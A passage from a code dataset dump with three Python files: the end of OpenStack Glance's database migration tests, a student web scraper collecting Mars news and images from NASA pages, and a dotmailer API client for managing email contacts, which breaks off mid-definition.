['artifact_origin'])]\n dependencies_columns = ['id',\n 'artifact_source',\n 'artifact_dest',\n 'artifact_origin',\n 'is_direct',\n 'position',\n 'name',\n 'created_at',\n 'updated_at']\n self.assert_table(engine, 'artifact_dependencies',\n dependencies_indices,\n dependencies_columns)\n\n locations_indices = [\n ('ix_artifact_blob_locations_blob_id', ['blob_id'])]\n locations_columns = ['id',\n 'blob_id',\n 'value',\n 'created_at',\n 'updated_at',\n 'position',\n 'status']\n self.assert_table(engine, 'artifact_blob_locations', locations_indices,\n locations_columns)\n\n def _pre_upgrade_042(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n\n # These will be dropped and recreated as unique constraints.\n self.assertTrue(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_namespace_id',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_resource_types_name',\n metadef_resource_types.name, engine))\n\n # This one will be dropped - not needed\n self.assertTrue(index_exist(\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n metadef_ns_res_types.name, engine))\n\n # The rest must remain\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_name',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n # To be created\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_objects_namespace_id_name',\n metadef_objects.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_properties_namespace_id_name',\n metadef_properties.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_tags_namespace_id_name',\n metadef_tags.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_namespaces_namespace',\n metadef_namespaces.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_resource_types_name',\n metadef_resource_types.name, engine)\n )\n\n def _check_042(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n\n # Dropped for unique constraints\n self.assertFalse(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n self.assertFalse(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n self.assertFalse(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n self.assertFalse(index_exist('ix_metadef_tags_namespace_id',\n metadef_tags.name, engine))\n self.assertFalse(index_exist('ix_metadef_resource_types_name',\n metadef_resource_types.name, engine))\n\n # Dropped - not needed because of the existing primary key\n self.assertFalse(index_exist(\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n metadef_ns_res_types.name, engine))\n\n # Still exist as before\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_name',\n metadef_tags.name, engine))\n\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_namespaces_namespace',\n metadef_namespaces.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_objects_namespace_id_name',\n metadef_objects.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_properties_namespace_id_name',\n metadef_properties.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_tags_namespace_id_name',\n metadef_tags.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_resource_types_name',\n metadef_resource_types.name, engine)\n )\n\n def _post_downgrade_042(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n\n # These have been recreated\n self.assertTrue(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_namespace_id',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_resource_types_name',\n metadef_resource_types.name, engine))\n\n self.assertTrue(index_exist(\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n metadef_ns_res_types.name, engine))\n\n # The rest must remain\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_name',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n # Dropped\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_objects_namespace_id_name',\n metadef_objects.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_properties_namespace_id_name',\n metadef_properties.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_tags_namespace_id_name',\n metadef_tags.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_namespaces_namespace',\n metadef_namespaces.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_resource_types_name',\n metadef_resource_types.name, engine)\n )\n\n def assert_table(self, engine, table_name, indices, columns):\n table = db_utils.get_table(engine, table_name)\n index_data = [(index.name, index.columns.keys()) for index in\n table.indexes]\n column_data = [column.name for column in table.columns]\n # instead of calling assertItemsEqual, which is not present in py26\n # asserting equality of lengths and sorted collections\n self.assertEqual(len(columns), len(column_data))\n self.assertEqual(sorted(columns), sorted(column_data))\n self.assertEqual(len(indices), len(index_data))\n self.assertEqual(sorted(indices), sorted(index_data))\n\n\nclass TestMysqlMigrations(test_base.MySQLOpportunisticTestCase,\n MigrationsMixin):\n\n def test_mysql_innodb_tables(self):\n migration.db_sync(engine=self.migrate_engine)\n\n total = self.migrate_engine.execute(\n \"SELECT COUNT(*) \"\n \"FROM information_schema.TABLES \"\n \"WHERE TABLE_SCHEMA='%s'\"\n % self.migrate_engine.url.database)\n self.assertTrue(total.scalar() > 0, \"No tables found. Wrong schema?\")\n\n noninnodb = self.migrate_engine.execute(\n \"SELECT count(*) \"\n \"FROM information_schema.TABLES \"\n \"WHERE TABLE_SCHEMA='%s' \"\n \"AND ENGINE!='InnoDB' \"\n \"AND TABLE_NAME!='migrate_version'\"\n % self.migrate_engine.url.database)\n count = noninnodb.scalar()\n self.assertEqual(count, 0, \"%d non InnoDB tables created\" % count)\n\n\nclass TestPostgresqlMigrations(test_base.PostgreSQLOpportunisticTestCase,\n MigrationsMixin):\n pass\n\n\nclass TestSqliteMigrations(test_base.DbTestCase,\n MigrationsMixin):\n def test_walk_versions(self):\n # No more downgrades\n self._walk_versions(False, False)\n\n\nclass ModelsMigrationSyncMixin(object):\n\n def get_metadata(self):\n for table in models_metadef.BASE_DICT.metadata.sorted_tables:\n models.BASE.metadata._add_table(table.name, table.schema, table)\n for table in models_artifacts.BASE.metadata.sorted_tables:\n models.BASE.metadata._add_table(table.name, table.schema, table)\n return models.BASE.metadata\n\n def get_engine(self):\n return self.engine\n\n def db_sync(self, engine):\n migration.db_sync(engine=engine)\n\n def include_object(self, object_, name, type_, reflected, compare_to):\n if name in ['migrate_version'] and type_ == 'table':\n return False\n return True\n\n\nclass ModelsMigrationsSyncMysql(ModelsMigrationSyncMixin,\n test_migrations.ModelsMigrationsSync,\n test_base.MySQLOpportunisticTestCase):\n pass\n\n\nclass ModelsMigrationsSyncPostgres(ModelsMigrationSyncMixin,\n test_migrations.ModelsMigrationsSync,\n test_base.PostgreSQLOpportunisticTestCase):\n pass\n\n\nclass ModelsMigrationsSyncSQLite(ModelsMigrationSyncMixin,\n test_migrations.ModelsMigrationsSync,\n test_base.DbTestCase):\n pass\n","sub_path":"glance/tests/unit/test_migrations.py","file_name":"test_migrations.py","file_ext":"py","file_size_in_byte":78006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"284182654","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup\nimport time\nimport pandas as pd\n\n\ndef init_browser():\n executable_path = {\n \"executable_path\": \"/Users/rober/Desktop/web-scraping-challenge/Missions_to_Mars/chromedriver\"}\n return Browser(\"chrome\", **executable_path, headless=False)\n\n\ndef scrape():\n time.sleep(1)\n browser = init_browser()\n url = \"https://mars.nasa.gov/news/\"\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, \"html.parser\")\n\n # stuff = soup.find_all('div', class_=\"content_title\").get_text()\n title = soup.find_all('div', class_=\"content_title\")[1].get_text()\n atext = soup.find('div', class_=\"article_teaser_body\").get_text()\n\n url2 = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\n browser2 = init_browser()\n browser2.visit(url2)\n html2 = browser2.html\n soup2 = BeautifulSoup(html2, \"html\")\n\n featured_image_url = soup2.find(\"a\", class_=\"button fancybox\").get_text()\n\n url4 = \"https://space-facts.com/mars/\"\n\n tables = pd.read_html(url4)\n space_df = tables[0]\n space_df.columns = [\"0\", \"1\"]\n space_df\n\n hemisphere_image_urls = [\n {\"title\": \"Valles Marineris Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/valles_marineris_enhanced.tif/full.jpg\"},\n {\"title\": \"Cerberus Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/cerberus_enhanced.tif/full.jpg\"},\n {\"title\": \"Schiaparelli Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/schiaparelli_enhanced.tif/full.jpg\"},\n {\"title\": \"Syrtis Major Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/syrtis_major_enhanced.tif/full.jpg\"},\n ]\n\n listings = {\n # \"Test1\": stuff,\n \"Test2\": title,\n \"Test3\": atext,\n \"Test4\": featured_image_url,\n \"Test5\": space_df,\n \"Test6\": hemisphere_image_urls\n }\n return listings\n","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"342474205","text":"from dotmailer import Base\nfrom dotmailer.constants import constants\nfrom dotmailer.connection import connection\nfrom dotmailer.address_books import AddressBook\n\n\nclass ContactScore(Base):\n \"\"\"\n Scoring information about a specific contact.\n \n \"\"\"\n contact_id = None\n email = None\n date_modified = None\n score_label = None\n score = None\n engagement = None\n suitability = None\n\n def _update_values(self, data):\n # Attempt to convert strings to the appropriate data type for contact\n # scores.\n for key in ['contact_id', 'score', 'engagement', 'suitability']:\n if key in data and data[key] is not None:\n data[key] = int(data[key])\n data['date_modified'] = self.strptime(data['date_modified'])\n super(ContactScore, self)._update_values(data)\n\n\nclass Contact(Base):\n \"\"\"\n This class represents a DotMailer contact. To be able to create a \n contact, you must specify the email of the contact.\n \n ``Required keyword arguments``\n \n **email** - `A string containing the email address of the contact \n that you wish to add.`\n \n ``Optional keywoard arguments``\n \n **opt_in_type** - `A string which represents the type of optin \n that the contact performed. You can either specify these values \n by hand or use the pre-defined constant values.`\n \n * :class:`Constants`.CONTACT_OPTINTYPE_UNKNOWN\n * :class:`Constants`.CONTACT_OPTINTYPE_SINGLE\n * :class:`Constants`.CONTACT_OPTINTYPE_DOUBLE\n * :class:`Constants`.CONTACT_OPTINTYPE_VERIFIEDDOUBLE\n \n **email_type** - `A string representing the type of email that the \n contact would prefer to receive. This can be either plain text or \n HTML. Alternatively use the constant values.`\n \n * :class:`Constants`.CONTACT_EMAILTYPE_HTML\n * :class:`Constants`.CONTACT_EMAILTYPE_PLAIN\n \n **data_fields** - `A dictionary of values which any data fields \n and value that should be associated with the contact e.g`\n \n .. code-block:: python\n \n { \n 'FavouriteColour': 'Red', \n 'age': 23\n }\n \n \"\"\"\n\n end_point = '/v2/contacts'\n email = None\n opt_in_type = constants.CONTACT_OPTINTYPE_UNKNOWN\n email_type = constants.CONTACT_EMAILTYPE_HTML\n data_fields = None\n\n def __init__(self, **kwargs):\n self.required_fields = ['email']\n\n # Reassign `delete` to reference the instance method rather\n # than the class method version.\n self.delete = self._delete\n self.unsubscribe = self._unsubscribe\n\n # Setup the other optional fields to the default value if they have not\n # been specified.\n if 'opt_in_type' not in kwargs:\n kwargs['opt_in_type'] = constants.CONTACT_OPTINTYPE_UNKNOWN\n if 'email_type' not in kwargs:\n kwargs['email_type'] = constants.CONTACT_EMAILTYPE_HTML\n if 'data_fields' not in kwargs:\n kwargs['data_fields'] = None\n super(Contact, self).__init__(**kwargs)\n\n def __repr__(self):\n return \"ID:{}, Email:{}, DataFields:{}\".format(\n self.id,\n self.email,\n self.data_fields\n )\n def _update_values(self, data):\n if 'data_fields' in data:\n # If the data fields is a list then this is likely to be\n # coming back from the server as a list of dictionaries\n # so we need to unpack them\n if isinstance(data['data_fields'], list):\n data['data_fields'] = {\n entry['key']: entry['value']\n for entry in data['data_fields']\n }\n super(Contact, self)._update_values(data)\n\n def param_dict(self):\n contact_data_fields = []\n if self.data_fields is not None:\n contact_data_fields = [\n {'key': key, 'value': value}\n for key, value in self.data_fields.items()\n ]\n return {\n 'Email': self.email,\n 'OptInType': self.opt_in_type,\n 'EmailType': self.email_type,\n 'DataFields': contact_data_fields\n }\n\n def create(self):\n \"\"\"\n Creates a contact\n\n :return:\n \"\"\"\n response = connection.post(\n self.end_point,\n self.param_dict()\n )\n self._update_values(response)\n\n def update(self):\n \"\"\"\n Updates an existing contact's data. Unlike the DotMailer's API\n you currently can NOT create a contact using the update value and\n assigning an ID value of zero. If you need to create a contact\n then please use the create method.\n\n :return:\n \"\"\"\n self.validate_id('Sorry unable to update this contact as no ID value'\n ' has been defined.')\n response = connection.put(\n '{}/{}'.format(self.end_point, self.id),\n self.param_dict()\n )\n self._update_values(response)\n\n def _delete(self):\n \"\"\"\n Deletes an existing contact. When calling on an instance use \n `instance.delete()`.\n\n :return:\n \"\"\"\n self.validate_id('Sorry, unable to delete contact as no ID value is'\n 'defined for this contact.')\n\n # Attempt to issue the delete request to DotMailer to remove the\n # address book\n type(self).delete(self.id)\n\n # Clear the current ID value so we can't accidently call this\n # delete call multiple times\n self.id = None\n\n @classmethod\n def delete(cls, id):\n connection.delete(\n '{}/{}'.format(cls.end_point, id)\n )\n return True\n\n def add_to_address_book(self, address_book):\n \"\"\"\n Adds a contact to a specific address book\n\n :param address_book: This should be an instance of :class:`AddressBook`\n :return:\n \"\"\"\n address_book.add_contact(self)\n\n def delete_from_address_book(self, address_book):\n \"\"\"\n Deletes a contact from a given address book\n\n :param address_book:\n :return:\n \"\"\"\n address_book.delete_contact(self)\n\n @staticmethod\n def delete_multiple_from_address_book(id_list, address_book):\n \"\"\"\n Deletes multiple contacts from an address book\n\n :param id_list:\n :param address_book:\n :return:\n \"\"\"\n address_book.delete_multiple_contacts(id_list)\n\n @staticmethod\n def delete_all_from_address_book(address_book):\n \"\"\"\n Deletes all contacts from a given address book\n\n :param address_book:\n :return:\n \"\"\"\n address_book.delete_all_contacts()\n\n @classmethod\n def get_by_email(cls, email):\n \"\"\"\n Gets a contact by email address\n\n :param email:\n :return:\n \"\"\"\n response = connection.get(\n cls.end_point + '/' + email\n )\n return cls(**response)\n\n @classmethod\n def get_by_id(cls, id):\n \"\"\"\n Gets a contact by ID\n\n :param id:\n :return:\n \"\"\"\n # TODO: Add some type checking in to make sure that the value supplied is actually an int\n response = connection.get(\n '{}/{}'.format(cls.end_point, id)\n )\n return cls(**response)\n\n def get_address_books(self, select=1000, skip=0):\n \"\"\"\n Gets any address books that a contact is in\n\n :param select:\n :param skip:\n :return:\n \"\"\"\n self.validate_id('Sorry, unable to get the address books that this'\n 'contact is in, due to no ID value being associated'\n 'with the contact.')\n\n response = connection.get(\n '{}/{}/address-books'.format(self.end_point, self.id),\n query_params={'Select': select, 'Skip': skip}\n )\n return [AddressBook(**entry) for entry in response]\n\n def get_all_address_books(self):\n \"\"\"\n Automatically performs all requests needed to return every possible\n address book that this contact is associated with.\n\n :return:\n \"\"\"\n all_address_books = []\n select = 1000\n skip = 0\n address_books = self.get_address_books(select, skip)\n num_of_entries = len(address_books)\n while num_of_entries > 0:\n all_address_books.extend(address_books)\n if num_of_entries < select:\n break\n skip += select\n address_books = self.get_address_books(select, skip)\n num_of_entries = len(address_books)\n return all_address_books\n\n @classmethod\n def get_multiple(cls, select=1000, skip=0):\n \"\"\"\n Gets a list of all contacts in the account\n\n :param select:\n :param skip:\n :return:\n \"\"\"\n # TODO: Add some validation in for the parameter data types\n response = connection.get(\n cls.end_point,\n query_params={'Select': select, 'Skip': skip}\n )\n return [cls(**entry) for entry in response]\n\n @classmethod\n def get_all(cls):\n all_contacts = []\n select = 1000\n skip = 0\n contacts = cls.get_multiple(select, skip)\n num_of_entries = len(contacts)\n while num_of_entries > 0:\n all_contacts.extend(contacts)\n if num_of_entries < select:\n break\n skip += select\n contacts = cls.get_multiple(select, skip)\n num_of_entries = len(contacts)\n return all_contacts\n\n @classmethod\n def get_contacts_since(cls, date, with_full_data=True, select=1000, skip=0):\n \"\"\"\n Gets a list of created contacts after a specified date\n\n :param date:\n :param with_full_data:\n :param select:\n :param skip:\n :return:\n \"\"\"\n response = connection.get(\n '{}/created-since/{}'.format(\n cls.end_point, date.strftime('%Y-%m-%d')\n ),\n query_param={\n 'WithFullData': with_full_data, 'Select': select, 'Skip': skip\n }\n )\n return [cls(**entry) for entry in response]\n\n @classmethod\n def get_all_contacts_since(cls, date, with_full_data=True):\n \"\"\"\n Get all the contacts that have been created since a specific \n date. \n \n This function will automatically handle making all the calls\n required to get a complete list i.e. if there are more than\n 1000 contacts since the specified date.\n \n :param date: \n :param with_full_data: \n :return: \n \"\"\"\n select = 1000\n skip = 0\n all_contacts = []\n\n contacts = cls.get_contacts_since(date, with_full_data, select, skip)\n num_of_entries = len(contacts)\n while num_of_entries > 0:\n all_contacts.extend(contacts)\n if num_of_entries < select:\n break\n\n skip += select\n contacts = cls.get_contacts_since(\n date, with_full_data, select, skip)\n num_of_entries = len(contacts)\n\n return all_contacts\n\n @classmethod\n def bulk_create(cls, filedata):\n \"\"\"\n Bulk creates, or bulk updates, contacts.\n \n This function allows you to upload a bulk number of contacts to \n the server. The contact data must be in either a CSV or Excel\n format, and it must include one column that is called 'Email' or\n equivalent if your account is using a language other than \n English. All other columns will be mapped to your custom contact\n data fields.\n \n Currently DotMailer place a file upload limit of 10MB. If your\n data is larger than this then you will need to split it into\n small chunks.\n \n The API will return an ID for the import, and the current status.\n You can re-query the import status later, by using the unique\n ID value.\n \n :param filedata: Either a file or filepath which can be read from \n :return: \n \"\"\"\n\n url = '{}/import'.format(cls.end_point)\n\n return connection.post(url, {}, files={'file': filedata})\n\n # TODO: Since this uses a different end point, should we move this to the address-book class and just call into it from here?\n @classmethod\n def bulk_create_in_address_book(cls, address_book, filedata):\n \"\"\"\n Bulk creates, or bulk updates, contacts in an address book.\n \n Similar to the bulk create verions, this function can be used to\n create a bulk number of contacts in one go. However, this\n version will also automatically associate the contact with the\n address book that has been specified. The contact data must be \n in either a CSV or Excel format, and it must include one column \n that is called 'Email' or equivalent if your account is using a \n language other than English. All other columns will be mapped \n to your custom contact data fields.\n \n Currently DotMailer place a file upload limit of 10MB. If your\n data is larger than this then you will need to split it into\n small chunks.\n \n The API will return an ID for the import, and the current status.\n You can re-query the import status later, by using the unique\n ID value.\n \n :param address_book: \n :param filedata: \n :return: \n \"\"\"\n\n url = '/v2/address-books/{}/contacts/import'.format(address_book.id)\n\n return connection.post(url, {}, files={'file': filedata})\n\n @classmethod\n def get_contact_import_status(cls, id):\n \"\"\"\n Gets the import status of a previously started contact import.\n \n :param id: The bulk upload ID value returned when you submitted\n a bulk upload request. The ID is a GUID and should look similar\n to 842d81e8-c619-457f-bb77-ab6c4a17da39.\n :return: A dictionary that contains an the keys 'id' and 'status'.\n \"\"\"\n return connection.get(\n '{}/imports/{}'.format(cls.end_point, id)\n )\n\n @classmethod\n def get_contact_import_report(cls, id):\n \"\"\"\n Gets a report with statistics about what was successfully \n imported, and what was unable to be imported.\n \n :param id: \n :return: \n \"\"\"\n return connection.get(\n '{}/import/{}/report'.format(cls.end_point, id)\n )\n\n @classmethod\n def get_contact_import_report_faults(cls, id):\n \"\"\"\n Gets a report with statistics about what was successfully\n imported, and what was unable to be imported.\n\n :param id:\n :return:\n \"\"\"\n\n return connection.get(\n '{}/import/{}/report-faults'.format(cls.end_point, id)\n )\n\n # TODO: Should this be a call into the address book object\n @classmethod\n def get_contacts_from_address_book(cls, address_book, with_full_data=True,\n select=1000, skip=0):\n response = connection.get(\n '/v2/address-books/{}/contacts'.format(address_book.id),\n query_params={\n 'withFullData': with_full_data, 'select': select, 'skip': skip\n }\n )\n return [Contact(**entry) for entry in response]\n\n # TODO: Should this be a call into the address book object\n @classmethod\n def get_all_contacts_from_address_book(cls, address_book,\n with_full_data=True):\n all_contacts = []\n select = 1000\n skip = 0\n contacts = cls.get_contacts_from_address_book(\n address_book, with_full_data)\n num_of_entries = len(contacts)\n while num_of_entries > 0:\n all_contacts.extend(contacts)\n if num_of_entries < select:\n break\n skip += select\n contacts = cls.get_contacts_from_address_book(\n address_book, with_full_data)\n num_of_entries = len(contacts)\n return all_contacts\n\n # TODO: Should this be a call into the address book object\n @classmethod\n def get_modified_contacts_from_address_book_since(cls, address_book, date,\n with_full_data=True,\n select=1000, skip=0):\n response = connection.get(\n '/v2/address-books/{}/contacts/modified-since/{}'.format(\n address_book.id, date.strftime('%Y-%m-%d')\n ),\n query_params={\n 'withFullData': with_full_data, 'select': select, 'skip': skip\n }\n )\n return [Contact(**entry) for entry in response]\n\n # TODO: Should this be a call into the address book object\n @classmethod\n def get_all_modified_contacts_from_address_book_since(cls, address_book,\n date,\n with_full_data=True):\n all_contacts = []\n select = 1000\n skip = 0\n contacts = cls.get_modified_contacts_from_address_book_since(\n address_book, date, with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n while num_of_entries > 0:\n all_contacts.extend(contacts)\n if num_of_entries < select:\n break\n skip += select\n contacts = cls.get_modified_contacts_from_address_book_since(\n address_book, date, with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n return all_contacts\n\n @classmethod\n def get_modified_contacts_since(cls, date, with_full_data=True, select=1000,\n skip=0):\n response = connection.get(\n '{}/modified-since/{}'.format(\n cls.end_point, date.strftime('%Y-%m-%d')\n ),\n query_params={\n 'withFullData': with_full_data, 'select': select, 'skip': skip\n }\n )\n return [Contact(**entry) for entry in response]\n\n @classmethod\n def get_all_modified_contacts_since(cls, date, with_full_data=True):\n all_contacts = []\n select = 1000\n skip = 0\n contacts = cls.get_modified_contacts_since(\n date, with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n while num_of_entries > 0:\n all_contacts.extend(contacts)\n if num_of_entries < select:\n break\n skip += select\n contacts = cls.get_modified_contacts_since(\n date, with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n return all_contacts\n\n # @classmethod\n # def get_suppressed_contacts_since(cls, date, select=1000, skip=0):\n # response = connection.get(\n # '{}/suppressed-since/{}'.format(\n # cls.end_point, date.strftime('%Y-%m-%d')\n # ),\n # query_params={\n # 'select': select, 'skip': skip\n # }\n # )\n # # TODO: Need to think how to handle these objects since they are nested with additional information\n # return [Contact(**entry) for entry in response]\n #\n # @classmethod\n # def get_all_suppressed_contacts_since(cls, date):\n # all_contacts = []\n # select = 1000\n # skip = 0\n # contacts = cls.get_suppressed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # while num_of_entries > 0:\n # all_contacts.extend(contacts)\n # if num_of_entries < select:\n # break\n # skip += select\n # contacts = cls.get_suppressed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # return all_contacts\n #\n # @classmethod\n # def get_unsubscribed_contacts_since(cls, date, select=1000, skip=0):\n # response = connection.get(\n # '{}/unsubscribed-since/{}'.format(\n # cls.end_point, date.strftime('%Y-%m-%d')\n # ),\n # query_params={\n # 'select': select, 'skip': skip\n # }\n # )\n # # TODO: Need to think how to handle these objects since they are nested with additional information\n # return [Contact(**entry) for entry in response]\n #\n # @classmethod\n # def get_all_unsubscribed_contacts_since(cls, date, select=1000, skip=0):\n # all_contacts = []\n # select = 1000\n # skip = 0\n # contacts = cls.get_unsubscribed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # while num_of_entries > 0:\n # all_contacts.extend(contacts)\n # if num_of_entries < 0:\n # break\n # skip += select\n # contacts = cls.get_unsubscribed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # return all_contacts\n #\n # @classmethod\n # def get_unsubscribed_contacts_from_address_book_since(cls, address_book,\n # date, select=1000,\n # skip=0):\n # response = connection.get(\n # '/v2/address-books/{}/contacts/unsubscribed-since/{}'.format(\n # address_book.id, date.strftime('%Y-%m-%d')\n # ),\n # query_params={\n # 'select': select, 'skip': skip\n # }\n # )\n # # TODO: Need to think how to handle these objects since they are nested with additional information\n # return [Contact(**entry) for entry in response]\n #\n # @classmethod\n # def get_all_unsubscribed_contacts_from_address_book_since(cls, address_book,\n # date):\n # all_contacts = []\n # select = 1000\n # skip = 0\n # contacts = cls.get_unsubscribed_contacts_from_address_book_since(\n # address_book, date, select, skip\n # )\n # num_of_entries = len(contacts)\n # while num_of_entries > 0:\n # all_contacts.extend(contacts)\n # if num_of_entries < select:\n # break\n # skip += select\n # contacts = cls.get_unsubscribed_contacts_from_address_book_since(\n # address_book, date, select, skip\n # )\n # num_of_entries = len(contacts)\n # return all_contacts\n\n def _unsubscribe(self):\n return type(self).unsubscribe(self.email)\n\n @classmethod\n def unsubscribe(cls, email):\n \"\"\"\n Unsubscribes contact from account\n \n :param email: \n :return: \n \"\"\"\n return connection.post(\n '{}/unsubscribe'.format(cls.end_point),\n {\n 'Email': email\n }\n )\n\n def _resubscribe(self, preferred_local=None,\n return_url_to_use_if_challenged=None):\n contact, status = type(self).resubscribe(\n self.email, preferred_local, return_url_to_use_if_challenged\n )\n\n # TODO: Look at a more dynamic way of this use __dict__ to pull out the variables that have been defined (excluding ID)\n data = {\n 'email': contact.email,\n 'opt_in_type': contact.opt_in_type,\n 'email_type': contact.email_type,\n 'date_fields': contact.data_fields,\n 'status': contact.status\n }\n self._update_values(data)\n return status\n\n @classmethod\n def resubscribe(cls, email, preferred_local=None,\n return_url_to_use_if_challenged=None):\n payload = {\n 'UnsubscribedContact': {\n 'Email': email\n }\n }\n if preferred_local is not None:\n payload['PreferredLocale'] = preferred_local\n if return_url_to_use_if_challenged is not None:\n payload['ReturnUrlToUseIfChallenged'] = return_url_to_use_if_challenged\n\n response = connection.post(\n '{}/resubscribe'.format(cls.end_point),\n payload\n )\n return Contact(**response['contact']), response['status']\n\n # https://developer.dotmailer.com/docs/resubscribe-contact-to-address-book\n\n @classmethod\n def get_scoring(cls, select, skip):\n \"\"\"\n \n :param select: \n :param skip: \n :return: \n \"\"\"\n response = connection.get(\n '{}/score/'.format(cls.end_point),\n query_params={\n 'Select': select, 'Skip': skip\n }\n )\n return [ContactScore(**entry) for entry in response]\n\n @classmethod\n def get_all_scoring(cls):\n \"\"\"\n \n :return: \n \"\"\"\n all_scoring = []\n select = 1000\n skip = 0\n scorings = cls.get_scoring(select, skip)\n num_of_entries = len(scorings)\n while num_of_entries > 0:\n all_scoring.extend(scorings)\n if num_of_entries < select:\n break\n skip += select\n scorings = cls.get_scoring(select, skip)\n num_of_entries = len(scorings)\n return all_scoring\n\n @classmethod\n def 